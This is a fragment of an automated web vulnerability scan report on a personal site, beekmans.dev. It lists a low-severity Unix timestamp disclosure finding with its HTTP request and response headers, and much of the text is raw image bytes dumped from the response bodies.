          ٕµ)*Êڕ”ÊÀÜG ƒî§«>¶ÃþQ?Î!7W÷kâ¿Ë]Ò©º‡Ùàz‹¹sõJ‘îp)±»°²•777-3['u‚¥¾óDµp§<r7‚eÞ6HG&H”|>®ƒø|ÙGÃÄváQÏoAâ ûGùzÙ·ïh¿ån—ÿ:"ÿ£ýľŸï¶ý‡¤5½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^½÷´_ò·KÿÑþýáÉþûoØzõG¯^ûÚ/ù[¥ÿΈ¿èÿ~ðäÿ}·ì=z£×¯}íü­ÒÿçD_ô¿xr¾Ûö½Që×¾ö‹þVéó¢/ú?ß¼9?ßmû^¨õëß{Eÿ+t¿ùÑýïÞŸï¶ý‡¯Tzõï½¢ÿ•º_üè‹þ÷ïO÷Û~Ãת=z÷ÞÑÊÝ/þtEÿGû÷‡'ûí¿aëÕ½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^¸>OL….ÕÀ¤êqþG¯j_Q×âØ¯ùÙãÿó¶›þ¾{ßÓÏþøØÍ×µ/ñ½ü[ÿ;<þvÓ×Ï~úyÿßûùºö¥þ!׿‹b¿çgÿÎÚoúùïßO?ûáÿaÿ7^Ô¿Ä:
          û·#Ÿª÷”P×QÍ+ãéôÇTHÖÈÑ1҈協ÇãÙß-Ã2ï{{4LYâðž‘ߐlç¡øGU…îgè)×½û¯uï~ëÝ{ߺ÷_ÿÑÙ_ÞDtëÞý׺÷¿uî½ïÝ{¡W«ÿÏæ?å•ýSì›wø`ûOù:4Û>)¾Áþ^…ÿduï~ëÝ{ߺ÷P2¿ñkÉÔgþãÉíȵ‹ý0ÿMÍý”¿éOø:+^Æz÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^è¦üœø½‚ïL;eñ"—Ù8ªR˜ŒÓ/Ž›1Aš<&|ƌòR±$AQf’•Àd,Œ²o’írxrU¬˜å}?¤¿?Qçöç§¢”ÆsðõDÛ£mgv~w)¶·6.¯
          ÃÔ½&G[ŽzyBRXeƒÇ"ŽXÙ]•2|3EqsBá¢aPGú¿âº1R)%äúÿ°ÿŠûÙàzs¨/ÿ÷¦êã‰êŸŸõÿâ¾èzºñ꟟õýÓ«¯¡?üGºzuuêý?Ûû©êãêý=ÐõqçÔ9>þÃþ#Ýz¸áÔ9??ë{¡ãùõqèOôï¿§ºtààz‚ÿAþ¿ºõo>¡Éùÿ}ù÷CӟÃÔ)??ëÄ{¡êÿÃÔ9=Ôùõo>¡Éùÿ}ùöÙâ:¿˜û:…'Ôÿ­ÿ\qêýß_to‡«>¡?üWÝŸWOP¤üÿ®â}ÔõqçÔ)8¹oøu<GW^^ïò÷þb_~p}
          ßÙÂrÁŠëÞÉËÔßïÉÓ
          ÕÞÓµþü›GC‘¿ÓçË¢IC»ŽÝJÜ[®<Àÿÿ(è+»ìÔwf˜âÊ?¿å˜êò½‘ôëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^èlë/ø³×ÚÉ¿÷›Ùíý¼é?Êz9Û²“ý7ùBG²®Œz÷¿uî½ïÝ{¤Îñÿg-ÿ,#ÿ܈}«±ÿràûÉÒkÏ÷_³ü£¢ãìSÐ{¯{÷^ëÞý׺÷¿uî¿ÿÒÙ_ÞDtëÞý׺÷¿uî½ïÝ{¡W«ÿÏæ?å•ýSì›wø`ûOù:4Û>)¾Áþ^…ÿduï~ëÝ{ߺ÷P2¿ñkÉÔgþãÉíȵ‹ý0ÿMÍý”¿éOø:+^Æz÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺+_%þ2mÎúÀšºoµÂv&•Ó¸Ìeb«uH¸Lÿ‰ZœTÎOŽ@ZI¼a”ɇ›6õ6×.“V´cܾŸÒ_CüŸ‘E1Œú¯T)¼vŽã؛)µ7f*§žÃÎi«è*”FýQˈZšZ˜˜IѳG,l©ܝðÝB“Àá¢aPGú°}G—FŠÁ€e8éÿñ_n7N'¨R~×ÿŠû¡êëǨr~×÷N®¼z„ÿñééÕרOôÿoî§«Ž¨/ô÷CÕǟPäú7ûøuêã‡Päüÿ­î‡çÕÇ¡?оþžéӃêýúþëÕ¼ú‡'çý÷çÝNP¤üÿ­ÿÿPä÷SçÕ¼ú‡'çý÷çÛgˆêþcìêŸSþ·üGºúuqǨOõÿ}ý}Ѿ®<ú„ÿñ_t>}\q=B“óþ¹ÿ‰÷SÕǟP¤üÿ¾þžêxŽ®¼:†ÿñÛôêãêô¿—§ó	ü¡~@çB X1=yÙyz›¶˜hv¦ñ®¨ki¶˜èr27˜g?¦Od[†ßÆ{uûGùGùGA]çe®»Ë4ù²ð¯ùGæ:¾d]º÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^èlë/ø³×ÚÉ¿÷›Ùíý¼é?Êz9Û²“ý7ùBG²®Œz÷¿uî½ïÝ{¤Îñÿg-ÿ,#ÿ܈}«±ÿràûÉÒkÏ÷_³ü£¢ãìSÐ{¯{÷^ëÞý׺÷¿uî¿ÿÓÙ_ÞDtëÞý׺÷¿uî½ïÝ{¡W«ÿÏæ?å•ýSì›wø`ûOù:4Û>)¾Áþ^…ÿduï~ëÝ{ߺ÷P2¿ñkÉÔgþãÉíȵ‹ý0ÿMÍý”¿éOø:+^Æz÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî‹?ɍ[_¿¶í¤ðawÞ"šUÛ;¤DI^^Q‡ÌˆÁ’³	S3k4”ÎÆH¾²G)ÆÑ¼MµËе³åÿ(ô?áà|ˆzŒGú'T¾ö6èëÏ“ÙûÇQ‡Îâf1TÒÎ.’ÆMଣoe\~¸fŒ”‘
          Á÷'As
          Ü	qná¢aÇü‡Ð1Ñ´l®5)Áé'çýø¯·ON¯¡Éùÿ_Ý:ºñêÿÄ{§§W^¡?Óý¿ºž®8 ¿ÓÝW}C“èßì?â=׫ŽC“óþ·º?ŸW:„ÿAþûú{§N¨/ôëû¯Vó꟟÷ߟt=9ü=B“óþ·üGº¯ü=C“ÝOŸVó꟟÷ߟmž#«ù³¨R}OúßñëéÕÇ¡?×ý÷õ÷Føz¸óêÿÅ}ÐùõqÄõ
          OÏúçþ'ÝOW}B“óþûú{©â:ºðêÿÄ{oӫލ/ôï¿§½uqÀõy?ËÇù8N…ùžÿqŸä؎ºì¬´üã¹Zz©¼k¦oø·~˜è²2Ÿò~"¼Z$ˆŠþº¦sæ?Ê?ÍÐWyÙ5¼³Nî,£Ïæ>~£öu~ÿ^G ý²>ýwïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^èlë/ø³×ÚÉ¿÷›Ùíý¼é?Êz9Û²“ý7ùBG²®Œz÷¿uî½ïÝ{¤Îñÿg-ÿ,#ÿ܈}«±ÿràûÉÒkÏ÷_³ü£¢ãìSÐ{¯{÷^ëÞý׺÷¿uî¿ÿÔÙ_ÞDtëÞý׺÷¿uî½ïÝ{¡W«ÿÏæ?å•ýSì›wø`ûOù:4Û>)¾Áþ^…ÿduï~ëÝ{ߺ÷P2¿ñkÉÔgþãÉíȵ‹ý0ÿMÍý”¿éOø:+^Æz÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¢éò+ã–Òù¶
          @EˆÞ¨e;[vEzš	[SÿÈÓ%vªSû“xØù#*÷ÔkµnÓí“jNèâ__˜ô#×ò==ÍT|>c­|»¯7oVÌÞ¸©qY¼d¾¤k½-u$…þÛ'Œª
          #­ÆÖ"–ŽUúØ«ueY:ÚêÈâÝõFGì>`úéÑÌN²ÊqÐ{'çýnôêñêÿÄ{§§W^¡?Óý¿ºž®8 ¿ÓÝW}C“èßì?â=׫ŽC“óþ·º?ŸW:„ÿAþûú{§N¨/ôëû¯Vó꟟÷ߟt=9ü=B“óþ·üGº¯ü=C“ÝOŸVó꟟÷ߟmž#«ù³¨R}OúßñëéÕÇ¡?×ý÷õ÷Føz¸óêÿÅ}ÐùõqÄõ
          OÏúçþ'ÝOW}B“óþûú{©â:ºðêÿÄ{oӫލ/ôï¿§½uqÀõO¡ÿ_ÛgÏ«Ž]ïòîþc§n6¡>AgYöó56'¯;'-Qs·®
          -­»ë§k¶úc¢¯“CqÇí´=1-õ†­S@½Þc׿>/?·ˆWzØü@זIßŔyü×çê<ü³Ç`ðCÊAR‚ ‚8 d:ïߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷CgYŞ»þÖMÿ¸´ÞÈ7oíãÿIþSÑÎÛý”Ÿé¿È:=•tc×½û¯uï~ëÝ&wü{9oùaþäCí]û—ÛþN“^¸ÒýŸåbžƒÝ{ߺ÷^÷î½×½û¯uÿÕÙ_ÞDtëÞý׺÷¿uî½ïÝ{¡W«ÿÏæ?å•ýSì›wø`ûOù:4Û>)¾Áþ^…ÿduï~ëÝ{ߺ÷P2¿ñkÉÔgþãÉíȵ‹ý0ÿMÍý”¿éOø:+^Æz÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^è•üÑÄ|{ÎlÜv7¹weÉÜSšÃ°÷$8¼¦k;¬êIÅà¨rÍ»3*%ZH‰bº]&ñ°?ØsŽw{L‘
          kZ€ûI7§ŸÊ•éU©˜91-W̫ϪÉSÃI[[KO]M“§§©š2TI[%|QHÉe,yJ„pT(‚x!”)‘ZàI
          K*’¤äiQòÁ#öÑÒùc¦‡ÿˆ÷_N®½B§ûu=\p=A§º®<ú‡'Ñ¿ØÄ{¯W:‡'çýot<>®8u	þƒý÷ô÷NœP_è?×÷^­çÔ9??ï¿>èzsøz…'çýoøt=_øz‡'ºŸ>­çÔ9??ï¿>Û<GWógP¤úŸõ¿â=×Ó«Ž=B¯ûïëîðõqçÔ'ÿŠû¡óêã‰êŸŸõÏüOºž®<ú…'çý÷ô÷SÄuuáÔ7ÿˆöß§WP_è?ßOzêãêŸCþ¿¶ÏŸW:…/çý‡üGºõqÀu³wòÊÝ_.évÙÚ½ÃÖü—Mä0ß{Ö£•ÜRŸ;ÄDö8LÞÛÉn(7–CjÖCþR´/4´j¢J'ŠJ`öà¶ÅÙ¢xµÈ¡ÏçJW×üü@{ô{ašI-nº½4'Ô4×ÔWùÖ¶Ùì· ß^÷î½×½û¯uï~ëÝ{ߺ÷CgYŞ»þÖMÿ¸´ÞÈ7oíãÿIþSÑÎÛý”Ÿé¿È:=•tc×½û¯uï~ëÝ&wü{9oùaþäCí]û—ÛþN“^¸ÒýŸåbžƒÝ{ߺ÷^÷î½×½û¯uÿÙ
          Evidence
          176341593
          Solution

          Manually confirm that the timestamp data is not sensitive, and that the data cannot be aggregated to disclose exploitable patterns.

        37. GET https://beekmans.dev/img/portfolio/minor/blue/39-thumbnail.jpg
          Alert tags
          Alert description

          A timestamp was disclosed by the application/web server - Unix

          Other info

          178977234, which evaluates to: 1975-09-03 12:53:54

          Request
          Request line and header section (266 bytes)
          GET https://beekmans.dev/img/portfolio/minor/blue/39-thumbnail.jpg HTTP/1.1
          Host: beekmans.dev
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: https://beekmans.dev/
          
          
          Request body (0 bytes)
          Response
          Status line and header section (1162 bytes)
          HTTP/1.1 200 OK
          Date: Mon, 06 Dec 2021 09:56:07 GMT
          Content-Type: image/jpeg
          Content-Length: 206479
          Connection: keep-alive
          last-modified: Tue, 02 Nov 2021 10:18:04 GMT
          etag: "3268f-5cfcb9bec2340"
          content-security-policy: default-src 'self' http: https: data: blob: 'unsafe-inline'
          x-frame-options: SAMEORIGIN
          x-xss-protection: 1; mode=block
          x-content-type-options: nosniff
          referrer-policy: no-referrer-when-downgrade
          strict-transport-security: max-age=31536000; includeSubDomains; preload
          Cache-Control: max-age=14400
          CF-Cache-Status: HIT
          Age: 2419
          Accept-Ranges: bytes
          Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=SYXxHO2kzCBxL9qJ96pBwK%2Fu7dVLWBMYkUBmyhg22h%2FJCxoI7u0Yf9ccFyIITYmPwk%2BYbhFBi8dkM8jrfr7jbM2TCDCUS4Fm46vKeCPMJFbFffN2RsHn4GLPwNUiVLI%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 6b94a47d1d0f4c43-AMS
          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
          
          
          Response body (206479 bytes)
          ÿØÿáæExifMM*bj(1!r2“‡i¨Ô
          ü€'
          ü€'Adobe Photoshop 21.0 (Macintosh)2019:12:03 13:35:22  ° v"*(2¬HHÿØÿíAdobe_CMÿîAdobed€ÿۄ			
          
          
          
          ÿÀT "ÿÝ
          ÿÄ?	
          	
          3!1AQa"q2‘¡±B#$RÁb34r‚ÑC%’Sðáñcs5¢²ƒ&D“TdE£t6ÒUâeò³„ÃÓuãóF'”¤…´•ÄÔäô¥µÅÕåõVfv†–¦¶ÆÖæö7GWgw‡—§·Ç×ç÷5!1AQaq"2‘¡±B#ÁRÑð3$bár‚’CScs4ñ%¢²ƒ&5ÂÒD“T£dEU6teâò³„ÃÓuãóF”¤…´•ÄÔäô¥µÅÕåõVfv†–¦¶ÆÖæö'7GWgw‡—§·ÇÿÚ?ì’I%iI$’JrúŸ«n}8Âëi¯Ðu¤T털?gº?’šž•‘yp«/$í‚fèç⥛ÿ,Sÿ…_ÿŸÏÕвtÃ"ë‰ò—,tµ 9°sî^GþÄ%û7þåäìBëX^kcŸK[a½€‚{´>¿üÕ0ZI`ZÞ%Ø.áxÿØ9¿÷/#ÿbýƒ›ÿrò?ö!uö0°L×5Ó‰§Ç䏿.ÁTGöoýËÈÿ؄¿`æÿܼýˆ]U
          º–Ü(umx¶´±ãX÷±Íö©úŒýÆÿ¯ÉžDXF4H:£É~ÁÍÿ¹yû—ìßû—‘ÿ±­W݀| ¤û+{«¬>À	c
          Æ=­Ý®ÝÈûòì¡y'ô,Úë6»+#cD’/¨ö]‹f=µåd<›ë¬¶ËšZ÷mxsWaœp^ç1µ8Ña¶½aöïÌzä³~Ž7þ£þ©IŠfbÊ$+GdòRNy?É«T’I$§ÿÐì’I%iI!Úm5F°‰EF”åæÿË4áGÿçÅ·õséäü+ÿы7þZ£ÿ
          ?ÿ>-¿«ŸO'á_þŒK'óGËþét]+…€ã½Ûš,ö€ÂG¨æí­ÞýŸAX-
          lëÒ~à?+”ÏÑUNëïJ¤9ùx¸8wçe¸2ŒjÝe"a­ŒÎwòW5‹ÒúÏÖJۛÖrïé˜Wø½#â—úF6ÙÔ2X=k-µ§ßŽÏM”Æo­\úðÖ¿¢×]ÀK3pٙ<z'"ŸSwò~Š?ւöt÷ÙìnÐ,’-ÎÖÔG溯ç=ßÍïHςC}æ¯ÃÝÉw\DFüܱõB†ÐÜÏ«_+
          çɤ›Ý‘c„ûo£ Ûê}Å«¿W:æOR¯#¨TÜ^¯Ó^)ÏÇÛ.©É ïÕòYï¯ÿ8U>©>ÛZßMþ™ihy2ƺ}cŽÝvîý«ÿ[S›ÆE» 5ݮɎÆFÚ7ÿÂzôÐä2Þ®ü—óx§6çºØ™nélîm‘ê}ý-ŸAŽhåÄ ýõ8Ø9ºx€¤+Q·üЎŒ:‰âFßú’¸Üÿ†èÿª]P…pÿ·ËóJã³þŽ/þ£þ©OËì|֗mßHüS'wÒ?È­RI$’ŸÿÑì“=í­…ï0Öò,‹t˜…Óà[î
          Øci}LÛ{†³ ’´+œõ|ÿ¯úÿ)ktÜÇd×aÜúÀ!ÝËNžïå5>CKì’×Îÿ–èÿÂoÿÏ«sêçÓÉøWÿ£wü»Gþþ}sêçÓÉøWÿ£26—é&.Ó€÷s÷ÿ§:Èø F€m:y»ÿ ›ª=KßÒÛüå§W¸çV׿k]ú/Sm¸ª¼U>Ku>‹Õz~GNËnì|¦ì$ùìß¤c½õÿ-sÔõûº[‰õ²—Î;MUuºêu´_Y®¿Òm¶ádÙ·õŠmýì¯Õõ=%ÓÛ[žA¢ƒk¸
          Ói3ü©nÔAGPz<áúéõyímÝ_1¦hÆÄ¥Ík\á·}™6VÌ|Zýߥ¹f}Të732η–1¾±u,“^]V±Ím~—è±1i¾¦ÐÖ;ôvYoé¿áoéXAÀxÂóß®¿UZδί•i+>Æ3¨>dÒí­¡ŽÜáíÆÈÙU~£¿£?þù¹!íэUïKOÑQâ‘lø¾‰é¿÷ÿ脃,ã~ŸÌcfæt½˜¶d9øºWuÐç4ðÜ\› 9Û¿í6K¿þbïÓú_iÔ¯ªÚàXâÚ÷ˆmÀn
          ${^æîc®«{Ñïå£?Ýro¡ï®ÍÎ¥ýïø›?ê
          ã:‡ÑÅÿÃxÿõK±ÍméÏm¯XÚð6‡83Üýží›¿uqÝGèâÿáÌúµs—ùK^[÷wôÅ2w}#ñLŠÅ$’I)ÿÒì–?_Ê{V00ÂßQÿÊ2ZÉþ¦Õ°‘õ_©2‹ï¶æXþ´w¾=ÌÑVøã–ñ>´ຜ,JñhkY«Þ¬yåÆ?ê>Äcõ¤G¯“¯òÙÿ¤U̼
          °é«ÓsœWï‚`7Ghû‰±•Jˆ/)×óNUǹ¬Šæm'o62¿uë~n)qÇ¥µ—Àw¾f>Ó­ß¼¶:—FÄêO®ËÝeo¨‡VF­'v×5íç*óG§§ÈûëÿÒiÀƨ¨?óó«þë~öÿé¿ççWýÖýíÿÒ(ßóG§§ÈûëÿÒi͝þŸ#ï¯ÿI¡Xÿt}е±~ºu¬¬š±«ô˜ûœ×Úö±€Ÿß£þ¿AhUÕþ´Ú^öx©‚Ë
          Žu[k/¾ƒmŒ¿»+mc¹ïÞÏ ³ßõo«2èȼ]]–׸Tæîc὏©Ì{W+gÖ.³‘éÙ~Kí,pµ¡çsCçÔÝé;ôOÚÿ¡]Œô«ÿè#ö.ˆ'gµ¯ë[¶·ß^Nñ«©¹½{š*{-½¯sY„ë[¶¬w¹õ½›þ‚¥Ô¾²uæ?¦õ*j»Óp¦á2Ͷ†oöºš··Ò·ü+5oÖ~¹uÇ·$¾‹ÚúËZmÍµžÖlÛcö3üøMkôLýa§'¨uí9>¿¦ç3`Üuß¹Ž÷~gµ¯%Þ¨z»:Xo¯ãÑ/ý>€×ŠçûFßQÝ7%ßKs)ý&þsôÎÓúM:)ôim;Ý`d€çêâ&FãùÛygãýZÅÆvê2²Ii#ôdÓ½š:¯Írӓ0t?ø*ÆBñ¼¿­ûÒýÞ&ÿ-ž9	,ºGú¿Õýî—Zë]S†vƒÒtINÇ;eŒüýËõ‡æß‹A¥µ´ÐýÁÅßEãH-oï.žú*È¢Ê.nêíik‡‘ÿ¿5gc}Wéô]MæËžêËmkæAƒì±ÁŒký?Q¿ÛVyLàÀé(ÿ΋[›ÃÁ.1òÈÿ‹'eßHüS$’™¨¤’I%?ÿÓìÚǼ–±¥ç˜h’¶±­
          Ç­®kÚÐ,w Gî¬þ–æ·%ÅÄ4l:;µiœ¬``ÚÀG#pþõ.Cf©l{¯ë3Áßæ;ÿ"©õ-×VÆÔǸ‡I†;ˆ#¸óVþ׋þš¿ó‡÷¥ö¼_ôÕÿœ?½0X7E%Åû6OúÿšRû6OúÿšV×ÚñÓWþpþô¾×‹þš¿ó‡÷©=É~ê8GwìÙ?è_þiU:…ù˜~˜¯§ef$ŸEš4ún#ó§Úº_µâÿ¦¯üáýé}¯ý5çïKܗwx¼Ž£ÔîǺ‘Ðóšm­õ‡Èíu{¾æî\“~«õÐÐ>œ æ^½‡íx¿é«ÿ8z_kÅÿM_ùÃûÒ÷Oî~k­‹ãÿóc®ÿÜŸûeëwêû:·GÄ·Α™y¶ßT9Œ-le{aàþâô?µâÿ¦¯üáýé}¯ý5çïKÝ?¹ù¨›KËàåæåÞi³¥åâ
          ¥ÂË[,$~d€6»÷U㍐D^GõJÚû^/újÿÎޗÚñÓWþpþôŽCû«hwy~£™WK¯~Cíx>†3´ÞáùÖÍÇ®}ÿ¿üÚäÝÔ³Æyê>±v[¹ä{\ßô.¯þãÿÁèÏzØúó‹”þ¤ÌÚ/g°VÝ퇁³vìg£õ7zµþÿé?bŸ(F<Qˆ7ýêùdœèJF\:{N“Ô+êÔ1Ø}Zà_@÷9„ýëÔý¿¢³þþ¯}›'ýÿÍ+Îñs²ú~[30¬ô²+àò×4ý*­gøJŸùìÿўõé]ë>YÄ6nn>MP21Þá,'óÚã·Ô¡ÿàíÿÑ¿£LÉÅ@°³„!û6OúÿšT_]Œ€ö9“Æá·V10.dŸåïYýYíu•mpt5ÜîÔÈ̓DRÑÿÔî1¿œ?Õþ!BïçŸñþçT•ŸÒYÑúD´_<$œ‡è}Ñ|ð’J~‡Ñ-Ï	$§è}Ñ|ð’J~‡Ñ-Ï	$§è}Ñ|ð’J~„¿Ðô,ûNß³í>¶ÿ£·ù_ëýEÃdú>«þÏ¿ÐÜ}/SéíüÝð¼Ñ%&>©‹èRéß´hÓû.~Û'ÓýÝ¿á}yöý›oóûÿó禼õ$e³#ôES¾½ÛwKwm³ùÛ7{¶nú‘²þ“>ò¯œRPu}ÿÙÿí.Photoshop 3.08BIMïZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%G+R8BIM%jäÞ캐Lµj`,ë–E¯8BIM:åprintOutputPstSboolInteenumInteClrmprintSixteenBitboolprinterNameTEXTprintProofSetupObjcProof Setup
          proofSetupBltnenumbuiltinProof	proofCMYK8BIM;-printOutputOptionsCptnboolClbrboolRgsMboolCrnCboolCntCboolLblsboolNgtvboolEmlDboolIntrboolBckgObjcRGBCRd  doub@oàGrn doub@oàBl  doub@oàBrdTUntF#RltBld UntF#RltRsltUntF#Pxl@R
          vectorDataboolPgPsenumPgPsPgPCLeftUntF#RltTop UntF#RltScl UntF#Prc@YcropWhenPrintingboolcropRectBottomlongcropRectLeftlong
          cropRectRightlongcropRectToplong8BIMíHH8BIM&?€8BIMò
          ÿÿÿÿÿÿ8BIM
          8BIM8BIMó	8BIM'
          8BIMõH/fflff/ff¡™š2Z5-8BIMøpÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿèÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿèÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿèÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿè8BIM8BIM
          8BIM08BIM-)í8BIM@@8BIM8BIM}v°$19-top_5_vulnerability_scanners copy°vnullboundsObjcRct1Top longLeftlongBtomlongvRghtlong°slicesVlLsObjcslicesliceIDlonggroupIDlongoriginenumESliceOrigin
          autoGeneratedTypeenum
